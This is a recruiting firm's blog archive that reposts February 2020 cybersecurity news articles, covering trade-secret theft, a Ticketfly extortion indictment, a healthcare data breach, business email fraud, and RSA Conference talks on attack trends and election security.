Intelligent Connections. Recruiting Integrity.
Call Us: 415-510-2973

Archive for February 2020

US Jails Chinese Scientist for Stealing $1bn of Trade Secrets

US Jails Chinese Scientist for Stealing $1bn of Trade Secrets

A Chinese scientist convicted of stealing trade secrets worth $1bn from an Oklahoma petroleum company has been jailed in the United States. 

Hongjin Tan was employed by the unnamed company in June 2017 to work in a group whose goal it was to develop next-generation battery technologies for stationary energy storage. 

Vigilant coworkers caught the 36-year-old Chinese national and US legal permanent resident stealing hundreds of files containing proprietary information specifically related to flow batteries.

After being confronted with the theft, Tan admitted intentionally copying and downloading the research and development materials onto a thumb drive without authorization from his employer.

Realizing the jig was up, Tan turned in the thumb drive along with his resignation in December 2018. But when investigators examined the storage device, they found evidence that five documents that had been stored on it had since been deleted. 

The missing files were later located on an external hard drive recovered during a search of Tan's premises. It transpired that Tan had swiped the files and squirreled them away at home, where they could be accessed, and potentially sold, at a later date. 

On November 12, 2019, Tan pleaded guilty to theft of a trade secret, unauthorized transmission of a trade secret, and unauthorized possession of a trade secret.

Speaking at the time, Assistant Attorney General for National Security John C. Demers said: “Tan’s guilty plea continues to fill in the picture of China’s theft of American intellectual property.

"The Department launched its China Initiative to battle precisely the type of behavior reflected in today’s plea—illegal behavior that costs Americans their jobs—and we will continue to do so.”  

Yesterday, US District Judge Gregory K. Frizzell sentenced Hongjin Tan to 24 months in federal prison and ordered him to pay $150,000 in restitution to his former employer. After completing his two-year prison sentence, Tan will spend a further three years on supervised release.

“The sentencing of Hongjin Tan underscores the FBI’s commitment to protecting our country's industries from adversaries who attempt to steal valuable proprietary information," said Melissa Godbold, special agent in charge of the FBI Oklahoma City Field Office, said.

"American companies invest heavily in advanced research and cutting-edge technology. Trade secret theft is detrimental to our national security and free-market economy. It takes profits away from companies and jobs away from hard working Americans."

Source: Information Security Magazine

FBI Indicts Alleged Ticketfly Hacker

FBI Indicts Alleged Ticketfly Hacker

The FBI has indicted a man suspected of being responsible for a hack that compromised the accounts of 127 million Ticketfly users.

Moulak O. Ishak allegedly hacked into Ticketfly's systems in 2018. Ticketfly punters who tried to purchase tickets for upcoming live gigs were greeted with a picture of the V for Vendetta character and the message "Ticketfly HacKeD By IsHaKdZ."

At the time of the attack, Ticketfly was owned by Eventbrite, which made the decision to temporarily take the platform offline in the wake of the breach. Eventbrite issued the online message, “Following a series of recent issues with Ticketfly properties, we’ve determined that Ticketfly has been the target of a cyber incident.”

Following the attack, Motherboard claimed that hacker IsHaKdZ told them via email that he had warned Ticketfly of a vulnerability that allowed him to take control of all the databases for Ticketfly and its website. 

In what sounds a lot like a ransom demand, the hacker is purported to have told Motherboard that he offered to share details of the vulnerabilities with Ticketfly in exchange for 1 bitcoin but never received a reply from the platform's operators. 

Following the hack, the personal details of six Ticketfly users were posted to a server as proof that IsHaKdZ's claims of being able to access the databases were real.

According to the indictment issued on February 18, the FBI believes that Ishak, using the pseudonym IsHaKdZ, attempted to extort money from Ticketfly over a five-day period. 

Ishak has been indicted on one count of forfeiture and one felony count of extortion in relation to damage to a protected computer.

The alleged cyber-criminal has not been apprehended, though a warrant has been issued for his arrest. If caught and convicted of these charges, Ishak could face a fine of $250,000 and up to three years behind bars. 

The indictment reads: "On or about 27 May 2018, and continuing to at least 31 May 2018, in the Northern District of California and elsewhere, the defendant, with intent to extort from Ticketfly money and other things of value, transmitted in interstate and foreign commerce a communication containing a demand and request for money and other things of value in relation to damage to a protected computer, to wit, Ticketfly’s servers, where such damage was caused to facilitate the extortion."

Source: Information Security Magazine

#RSAC: The Five Most Dangerous New Attacks of 2020 Aren't All That New

#RSAC: The Five Most Dangerous New Attacks of 2020 Aren't All That New

A key highlight of any RSA Conference in San Francisco is the annual "Top 5 Most Dangerous New Attack Techniques and How to Counter Them" session led by experts from the SANS Institute.

For the 2020 edition, however, many of the attack vectors presented weren't entirely new, as old threats resurfaced. Additionally of note, while the title of the session is about the top five new attacks, researchers outlined more than that at this particular event.

Command and Control (C2) Returns

Ed Skoudis, instructor at the SANS Institute, highlighted what he referred to as the "golden age of c2" as one of his top new threats. C2, which stands for command control, is commonly associated with botnet activity that is controlled from a central command point.

Skoudis identified several ways that organizations can help protect themselves from C2 activity. Among his suggestions is for defenders to vigorously control outbound traffic and look for beacons and log anomalies. He also suggested that security professionals enforce application white-listing to limit what can run within the enterprise.

Living Off the Land

Another trend that Skoudis identified is the concept of living off the land, which refers to attackers' making use of tools that are already present within an organization and then abusing them for malicious gain.

"If you're an attacker, what you could do is you could use the resources of the operating system itself to attack that machine, and to spread to other systems in the environment, so you're living off the land," he said.

The concept of living off the land is not entirely new either, having been reported on at least as far back as 2015.

There are several things that organizations can do to protect against living off the land attacks. One set of resources cited by Skoudis is the LOLBAS project, which provides tools to help identify and limit the risk of attacks.

Deep Persistence

With the threat of deep persistence, Skoudis warned that malware can now be embedded deep into devices in a way that wasn't happening before. For example, he noted that it is now possible to embed malware in a USB charging cable.

With the charging cable example, even if an organization is able to purge whatever malware gets installed on a given system, with deep persistence, the next time the cable is plugged in, it will reinfect the system all over again.

Skoudis said that it's important for individuals and companies to not just plug anything into their system and to make sure that cables and other peripherals are acquired from trusted sources.

Mobile Device Integrity

Heather Mahalik, senior instructor and director of digital intelligence at SANS Institute highlighted the risk of mobile devices as one of her top threats.

Given that mobile phones have become an essential part of daily life, she noted that if a phone falls into the wrong hands it could be catastrophic. She wasn't just talking about lost or stolen devices, but also about the risk of refurbished devices that have not been properly wiped of the previous owner's data.

She also mentioned the risk of the checkm8 vulnerability in Apple IOS devices, which is a silicon vulnerability that enables the checkra1n jailbreak.

How 2FA Can Hurt You

Two-Factor Authentication (2FA) is a recommended best practice to help improve user security, but it's not a panacea either. Mahalik noted that simply having a code that needs to be typed in for 2FA isn't enough.

She also warned that there are some apps that only require a phone number, which is a risk if a user gives up their phone number and the carrier then reissues that number to a new customer.

"You want a password and 2FA," she said. "If it's just one or the other, it's not a good scenario."

Mahalik suggested that when users get a new phone number they should make sure they go into every application that has 2FA and change to the new number.

Enterprise Perimeter Vulnerabilities

Johannes Ullrich, dean of research at SANS Institute, identified the risk of enterprise perimeter vulnerabilities as one of his top threats.

Over the past year there have been numerous publicly reported issues in widely deployed enterprise firewall and perimeter security devices.

Aside from patching, Ullrich suggests that users never expose an administrative interface on an enterprise perimeter device to the public internet.

Localhost APIs

The final emerging threats identified by Ullrich are localhost APIs that are embedded in enterprise applications that call out to third-party resources. While the intention for the APIs is to enable functionality such as tech agent support, they also open up enterprises to potential risk.

To help limit the risk, Ullrich suggests that users, where possible, identify what is listening in to ports on a system and monitor how applications call out to external resources.

Source: Information Security Magazine

Michigan Healthcare Group Hack Went Undetected for Six Months

Michigan Healthcare Group Hack Went Undetected for Six Months

A data breach that exposed patients' personal health information (PHI) for almost three months went undetected for half a year at a Michigan healthcare group.

Hackers gained access to patient data placed in the safekeeping of Munson Healthcare Group by compromising the email accounts of at least two employees. Patient records were accessed from July 31, 2019, to October 22, 2019, but the breach went undetected until January 16, 2020.

What data was compromised in the prolonged attack varied from patient to patient, but information accessed by the hackers included financial account numbers, driver’s license numbers, dates of birth, and Social Security numbers. 

Health information, including insurance details, treatments, and diagnostic data were also exposed by the breach. 

Exactly how many patients were affected by the breach has not been revealed by Munson Healthcare, but given the size of the group, the number could potentially be high. From its base in Traverse City, Munson Healthcare operates nine hospitals in 30 counties spread through Northern Michigan.

The group has 7,500 employees and covers an area of 11,177 square miles, which is roughly the size of Vermont and Delaware combined.

“This incident does not affect all patients of Munson Healthcare and not all information was included for all individuals. Munson Healthcare is now notifying affected individuals so that they can take steps to protect their information,” a spokesperson for Munson Healthcare said.

The group went on to say that no evidence had been found to indicate that the information exposed in the breach had been acquired or misused by any third parties who accessed it. Given how long it took the group to detect that the breach had even occurred, this statement may come as cold comfort to Munson patients whose data was accessed by hackers.

"Patient privacy is a top priority and we take this matter very seriously,” said Lucas Otten, Munson Healthcare's director of information security.

“Munson regularly trains and educates all employees on cybersecurity awareness and risks, and we use a 24×7 staffed cybersecurity response team in partnership with other Michigan hospitals to detect and respond to suspicious incidents as they happen."

Source: Information Security Magazine

#RSAC: GM CEO Stresses Need to Invest in Developing Next Generation of Cyber Engineers

#RSAC: GM CEO Stresses Need to Invest in Developing Next Generation of Cyber Engineers

Delivering a keynote talk at the RSA Conference in San Francisco, Mary T Barra, chairman and CEO of General Motors Company, said “all of you today are the best and strongest line of defense in this on going and even more complex fight.”

Barra had concluded the first part of her keynote talk by saying that “we know this is a marathon with no finish line” and stressed the need for more talent, citing the most recent (ISC)2 Cyber Workforce Survey, which estimated a shortage of four million skilled people by 2022. She said that “without the right people and the right tools” security risks will increase, “and endanger all of us.”

She added that for long term success of every business that exists in a digital ecosystem “we must fill the talent gap, and not just with anyone but with everyone.”

She highlighted the need to recruit more “women and minorities, who are under-represented in the engineering and IT fields” so GM has run outreach programs to schools with a focus on pursuing “rewarding careers” and encouraging students to pursue science, technology, engineering and mathematics (STEM) careers, and “help them see a path for themselves in this space.” Last year this enabled 300,000 students and teachers across the United States, while General Motors has participated in nationwide careers programs and has encouraged its own engineers to do outreach to schools.

“If we want to cultivate young people of the future, we need to invest in theirs,” she said.

Source: Information Security Magazine

Let’s Encrypt Hits One Billion Certificate Milestone

Let’s Encrypt Hits One Billion Certificate Milestone

Free HTTPS tool Let’s Encrypt yesterday announced it has issued its billionth certificate, in what it claims to be a milestone for user privacy and security.

Backed by the non-profit Internet Security Research Group (ISRG), the initiative has good reason to make such claims, having made what was once a complex and expensive process — registering and managing TLS certificates — free and easy.

In a blog post from executive director, Josh Aas, and VP of comms, Sarah Gran, the two revealed how HTTPS page loads have risen from 58% of the global total in 2017 to 81%, and even higher (91%) in the US.

“When you combine ease of use with incentives, that’s when adoption really takes off. Since 2017 browsers have started requiring HTTPS for more features, and they’ve greatly improved the ways in which they communicate to their users about the risks of not using HTTPS,” they explained.

“When websites put their users at risk by not using HTTPS, major browsers now show stronger warnings. Many sites have responded by deploying HTTPS.”

However, there’s another side to the free encryption message: as well as making it easier for legitimate users to improve security, it has made it simpler for cyber-criminals to hide their activities online.

In 2016, for example, Trend Micro reported that malvertisers were using Let’s Encrypt to hide malicious advertising from network security tools.

A couple of years later, a flaw in Let’s Encrypt’s ACME protocol was found which could have allowed attackers to obtain certificates for domains they did not own.  

However, the organization has also been improving its own security and authentication processes. Last week it launched a multi-perspective domain validation system to ensure certificate applicants control the domains they’re hoping to register a cert for.

Source: Information Security Magazine

Shark Tank Star Corcoran Loses $400K in Email Scam

Shark Tank Star Corcoran Loses $400K in Email Scam

A US TV star has lost nearly $400,000 in a classic email fraud scam after a fraudster persuaded her bookkeeper to wire funds to a new bank account.

Multi-millionaire Barbara Corcoran describes herself as an “NYC real estate queen” and is one of the investors on popular show Shark Tank. However, on Wednesday, she took to Twitter with the brief message, “Lesson learned: Be careful when you wire money!”

In fact, it was her bookkeeper that had been tricked into wiring the $388,000 funds into an Asian bank, according to reports.

A fraudster reportedly spoofed the email address of Corcoran’s assistant, telling the bookkeeper to wire the funds to a German company called FFH Concept.

It’s unclear whether this was a legitimate supplier or a new organization, but the scammer apparently responded to an initial query for more information with a detailed explanation about the invoice.

That indicates they put in plenty of work ahead of time researching Corcoran’s business.

This modus operandi is similar to the business email compromise (BEC) or CEO fraud scams that netted scammers a staggering $1.8bn last year, accounting for half of all reported cybercrime losses. That’s up from around $1.3bn in 2018, according to the FBI.

Peter Goldstein, CTO and co-founder of Valimail, argued that firms cannot rely on human intuition alone to stop such scams.

“The phishing scam impacting Corcoran’s company clearly debunks the myth that phishing emails are easy to spot. Many companies invest in employee security training to prevent this kind of attack, but as this incident proves, humans are not able to identify malicious emails reliably,” he added.

“Hackers leverage impersonation and heavily researched social engineering tactics to appear as trustworthy senders, and their fraudulent messages are often indistinguishable from legitimate ones.”

Goldstein recommended investing in technologies which validate and authenticate sender identity. It’s reported that the email address used by the hacker was almost identical to that of Corcoran’s assistant but missing a single 'o' — a common tactic to trick recipients.

Source: Information Security Magazine

Facebook Sues Analytics Firm Over “Malicious” SDK

Facebook Sues Analytics Firm Over “Malicious” SDK

Facebook has filed a lawsuit in California against a data analytics company it claims has illegally accessed user data.

New Jersey-based OneAnalytics allegedly paid app developers to install a malicious software development kit (SDK) in their apps. This was designed to harvest information including name, gender, email and username of users logging in to the apps with their Facebook credentials, the social network claimed.

“Security researchers first flagged OneAudience’s behavior to us as part of our data abuse bounty program. Facebook, and other affected companies, then took enforcement measures against OneAudience,” wrote the firm’s director of platform enforcement and litigation, Jessica Romera.

“Facebook’s measures included disabling apps, sending the company a cease and desist letter, and requesting their participation in an audit, as required by our policies. OneAudience declined to cooperate.”

The firm is said to have done the same to Twitter and Google users. Twitter claimed in a notice that the issue was down to “a lack of isolation between SDKs within an application.

“Our security team has determined that the malicious SDK, which could be embedded within a mobile application, could potentially exploit a vulnerability in the mobile ecosystem to allow personal information (email, username, last Tweet) to be accessed and taken using the malicious SDK,” it explained.

“While we have no evidence to suggest that this was used to take control of a Twitter account, it is possible that a person could do so.”

In a statement back in November, OneAudience said that it was shutting down the offending SDK.

“Recently, we were advised that personal information from hundreds of mobile IDs may have been passed to our OneAudience platform. This data was never intended to be collected, never added to our database and never used,” it said.

“We proactively updated our SDK to make sure that this information could not be collected on November 13 2019. We then pushed the new version of the SDK to our developer partners and required that they update to this new version.”

Source: Information Security Magazine

#RSAC: Election Security Beyond the Ballot Box

#RSAC: Election Security Beyond the Ballot Box

There has been a lot written in recent years about election security and ensuring the integrity of voting systems. While voting machines are important, so too are non-voting election technologies, which was the topic of a session at the RSA Conference in San Francisco.

Aaron Wilson, Senior Director of Election Security at the Center for Internet Security (CIS), explained that non-voting election systems include things that support elections. Those systems include electronic poll books, election night reporting systems, voter registration systems, and electronic ballot delivery.

"There is a lot to that attack surface, but there are not a lot of standards and regulations," Wilson said.

The Center for Internet Security has developed a guide to help secure those non-voting election systems that has 160 best practices to help reduce risk and improve confidence. The overall goal, according to Wilson, isn't necessarily that every election official will do all the steps, but rather they will have a guide that provides questions to ask vendors and IT staff.

Core Recommendations

There are three key areas that Wilson suggested election officials should look at. The first is dealing with Denial of Service (DoS) risks.

"Denial of Service is concerning because you know exactly when to wage the attack against an election system," he said. "If you can take a service down in a moment of critical need it can have significant impact."

Ransomware is also a risk that election officials need to defend against. Wilson said that both DoS and ransomware attacks are essentially about availability and denying access to assets.

The third key area is something Wilson referred to as unauthorized data modification. That's a critical area for non-voting election system integrity, as an unauthorized change can throw an election into doubt.

Among the key recommendations that Wilson provided to reduce the risk of unauthorized data modification are the following:

  • Deployment of automated software patch management tools
  • Using best practices for securely handling input and output
  • Verifying data on backup media
  • Deployment of application layer filtering
  • Enforcement of access controls to data

Verifying Election Technology

Going a step beyond best practices, there is also an ongoing need to verify that systems are in fact operating as intended on a continuous basis. That's where the RABET-V: Rapid Architecture-Based Election Technology Verification framework comes into play.

"RABET-V is an election technology verification process that supports rapid product changes by design," Wilson said.

The RABET-V effort was launched in February 2020 as a pilot program and is available as an open source effort on github.

"It provides a consistent basis from which approval authorities can draw information, resulting in quicker decisions and reduced, amortized overall cost," Wilson concluded.

Source: Information Security Magazine

#RSAC: How to Hack Society

#RSAC: How to Hack Society

The method, procedures, and practices used by cybersecurity professionals have relevance beyond just the technology sphere; they can also be used to hack society.

That's the view espoused by Bruce Schneier, security technologist, researcher, and lecturer at the Harvard Kennedy School, during a keynote session at the RSA Conference in San Francisco.

"This is the big idea: we here in our community have developed some very effective techniques to deal with code and technology," Schneier said. "Can our expertise in IT security transfer to broader social systems like the tax code, or the systems we use to choose our elected officials or the market economy?"

Schneier argued that the hacker mindset, that is, an approach to thinking about how things fail and how to make things fail, has broader implications than just computer security. He suggested that the cybersecurity procedural mindset is valuable in a broader context and can be used to help secure the systems that make up society.

"As the world looks more like a computer, our security skills become more applicable," he said.

That said, Schneier noted that he didn't want to imply that technology can fix everything, but rather there is perhaps a way to blend technology and policy in a new way that can improve human communities.

The Hacking Mindset

Using a hacking mindset to impact society isn't an entirely new idea. Schneier remarked that NSA whistleblower Edward Snowden wrote in his memoir that the US intelligence community hacked the Constitution in order to justify mass surveillance.

"We can argue whether that's true or not, but everyone here intuitively knows what he means by that," Schneier said.

Another example of how the hacking mindset is already in use is within the advertising industry. Schneier argued that advertising is a hack of humans' cognitive systems to help influence choices.

Political forces are already using hacking type technique for propaganda as well.

"Authoritarian regimes are vulnerable to information attacks that challenge their monopoly on common political knowledge, and that is why an open internet is so dangerous to an autocracy," Schneier said. "Democracies are vulnerable to information attacks that turned common political knowledge into contested political knowledge."

Solutions

Schneier suggested that there are several ways modern cybersecurity practices can be used to hack society for good purposes.

In cybersecurity, having transparency and visibility is a foundational idea that is a useful concept for society in general.

"We have other solutions in our tech tool kit like defense in-depth, compartmentalization, isolation, sandboxing, audit, incident response, and patching," he said. "We never actually solve a security problem, we iterate, so is there some way to iterate law to have extensible law, where we implement some rapid feedback in our laws and regulations."

A key challenge that Schneier sees today is that we don't have policy institutions with footprints to match the technology that society uses. For example, he noted that Facebook is global, yet it's only regulated nationally by specific governments.

"Our problems tend to be social problems masquerading as tech problems and tech solutions masquerading the social solutions," Schneier said. "We need to better integrate tech and policy."

Source: Information Security Magazine